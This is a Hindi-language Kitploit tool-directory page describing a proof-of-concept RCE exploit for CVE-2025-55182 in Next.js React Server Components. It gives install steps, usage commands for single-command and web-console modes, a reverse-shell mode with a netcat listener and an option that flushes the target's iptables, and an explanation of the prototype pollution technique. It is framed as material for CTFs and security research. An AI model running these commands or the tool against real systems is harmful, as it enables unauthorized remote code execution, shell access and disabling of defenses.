Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
WEB-CLI_RCE_React2Shell — WEB-CLI_RCE_React2Shell CVE-2025-55182 के लिए एक शैक्षिक PoC एक्सप्लॉइट टूल है, जो React Server Components का उपयोग करने वाले Next.js अनुप्रयोगों में एक गंभीर Prototype Pollution दोष है। CTFs और शोध के लिए डिज़ाइन किया गया, इसमें RCE प्रदर्शित करने के लिए एक एकल-कमांड मोड, एक इंटरैक्टिव वेब CLI और रिवर्स शेल क्षमताएँ शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/raivenlockdown/web-cli_rce_react2shell
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूल

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

WEB-CLI_RCE_React2Shell CVE-2025-55182 के लिए एक शैक्षिक PoC एक्सप्लॉइट टूल है, जो React Server Components का उपयोग करने वाले Next.js अनुप्रयोगों में एक गंभीर Prototype Pollution दोष है। CTFs और शोध के लिए डिज़ाइन किया गया, इसमें RCE प्रदर्शित करने के लिए एक एकल-कमांड मोड, एक इंटरैक्टिव वेब CLI और रिवर्स शेल क्षमताएँ शामिल हैं।

GitHub
raivenlockdown/web-cli_rce_react2shell

WEB-CLI_RCE_React2Shell

रिपॉजिटरी देखें
52 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

REACT2SHELL

🎯 त्वरित अवलोकन (यह क्या है?)

यह टूल CVE-2025-55182 के लिए एक सरल Proof-of-Concept (PoC) exploit है। यह Next.js अनुप्रयोगों में पाया जाने वाला एक गंभीर दोष (Prototype Pollution) है, जो React Server Components का उपयोग करते हैं।

यदि कोई लक्षित सर्वर संवेदनशील है, तो यह स्क्रिप्ट आपको उस पर ऑपरेटिंग सिस्टम कमांड चलाने देती है (Remote Code Execution, या RCE)।

यह टूल सीखने, CTF और जिम्मेदार सुरक्षा अनुसंधान के लिए बनाया गया है।

Screenshot 2025-12-12 214115

⚠️ छात्रों और CTF खिलाड़ियों के लिए अस्वीकरण

नैतिक रूप से उपयोग करें। इस exploit को केवल उन्हीं सिस्टमों पर चलाएँ जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट, दस्तावेजित अनुमति है। अनधिकृत उपयोग अवैध है। यह टूल केवल शैक्षिक उद्देश्यों के लिए है।

🌟 इसका उपयोग कैसे करें

इस टूल में कमांड चलाने के तीन मुख्य तरीके हैं: एक साधारण एकल कमांड, एक पूर्ण इंटरैक्टिव वेब कंसोल, और एक क्लासिक रिवर्स शेल का प्रयास।

⚙️ इंस्टॉलेशन

  1. कोड प्राप्त करें:

    root@kitploit:~
    git clone https://github.com/raivenLockdown/WEB-CLI_RCE_React2Shell.git
    cd REACT2SHELL
    
  2. लाइब्रेरी इंस्टॉल करें:

    root@kitploit:~
    pip install requests
    

मोड 1: इंटरैक्टिव वेब कंसोल (CTF के लिए अनुशंसित)

यह लक्ष्य के साथ इंटरैक्ट करने का सबसे आसान तरीका है। यह आपकी मशीन पर एक स्थानीय वेब पेज शुरू करता है जो टर्मिनल की तरह कार्य करता है।

  1. स्क्रिप्ट चलाएँ:

    root@kitploit:~
    python3 exploit.py <TARGET_URL> --web-cli
    

    उदाहरण: python3 exploit.py http://target.com/ --web-cli

  2. अपना ब्राउज़र खोलें: स्क्रिप्ट आपको बताएगी कि http://127.0.0.1:8000/ खोलें। फिर आप सीधे वेब पेज पर कमांड (जैसे ls, whoami, cat /etc/passwd) टाइप कर सकते हैं।

मोड 2: एकल कमांड निष्पादन

एक कमांड चलाएँ और तुरंत अपने स्थानीय टर्मिनल में आउटपुट प्राप्त करें। अपना यूज़र ID खोजने जैसी त्वरित जाँच के लिए उपयोगी।

root@kitploit:~
python3 exploit.py <TARGET_URL> --cmd '<COMMAND>'

उदाहरण: python3 exploit.py http://target.com/ --cmd 'id'

मोड 3: रिवर्स शेल प्रयास

यदि आप एक स्थिर, सतत कनेक्शन चाहते हैं तो इस मोड का उपयोग करें। नोट: फ़ायरवॉल (egress filtering) के कारण यह वास्तविक-विश्व वातावरण में अक्सर विफल हो जाता है।

  1. अपना लिसनर शुरू करें (जैसे, netcat):

    root@kitploit:~
    nc -lvnp 55555
    
  2. exploit चलाएँ:

    root@kitploit:~
    python3 exploit.py <TARGET_URL> -i <YOUR_IP> -p 55555 [--flush]
    
    • -i <YOUR_IP>: आपकी मशीन का IP।
    • -p 55555: आपका लिसनर जिस पोर्ट का उपयोग कर रहा है।
    • --flush (वैकल्पिक): होस्ट फ़ायरवॉल साफ़ करने के लिए पहले लक्ष्य पर iptables -F चलाने का प्रयास करता है।

🔬 तकनीकी व्याख्या (Exploit कैसे काम करता है)

यह exploit RCE प्राप्त करने के लिए एक Prototype Pollution दोष का उपयोग करता है।

  1. Prototype Pollution: स्क्रिप्ट एक संवेदनशील Next.js एंडपॉइंट पर एक विशेष रूप से तैयार पेलोड भेजती है। यह पेलोड सर्वर के डेटा प्रोसेस करने के तरीके में एक दोष का फायदा उठाता है, जिससे हम मूल JavaScript ऑब्जेक्ट संरचना (Object.prototype) में गुण जोड़ सकते हैं।
  2. RCE ट्रिगर: हम एक विशिष्ट, आंतरिक गुण को दूषित करते हैं जो नियंत्रित करता है कि सर्वर कौन सा कोड चलाता है (Node.js के child_process का उपयोग करके)। हम उस गुण के मान को अपने शेल कमांड से बदल देते हैं।
  3. आउटपुट कैप्चर: एकल-कमांड या वेब CLI मोड में कमांड चलाते समय, exploit सर्वर से कमांड निष्पादित (execSync) करवाता है और तुरंत एक हानिरहित त्रुटि फेंकता है। कमांड का आउटपुट चतुराई से त्रुटि संदेश के digest फ़ील्ड में डाल दिया जाता है। फिर Python स्क्रिप्ट परिणाम प्राप्त करने के लिए इस फ़ील्ड को पढ़ती है।

🤝 संदर्भ और श्रेय

यह शोध सुरक्षा समुदाय द्वारा किए गए प्रारंभिक कार्य और प्रकटीकरण पर निर्भर करता है। सभी शोधकर्ताओं और ओपन-सोर्स योगदानकर्ताओं को धन्यवाद।

📚 मुख्य संदर्भ

  • CVE-2025-55182 के लिए मूल PoC रिपॉजिटरी - (इस exploit की नींव।)
  • मूल PoC कोड उदाहरण - (प्रारंभिक कोड उदाहरण।)
  • React Server Components में गंभीर सुरक्षा भेद्यता - (इस मुद्दे पर आधिकारिक React ब्लॉग पोस्ट।)
  • React में गंभीर भेद्यता (CVE-2025-55182) - (विस्तृत सुरक्षा विश्लेषण।)
  • React Server Functions दस्तावेज़ - (आधिकारिक दस्तावेज़ जो बताते हैं कि संवेदनशील घटक कैसे काम करते हैं।)
टूल डाउनलोड करें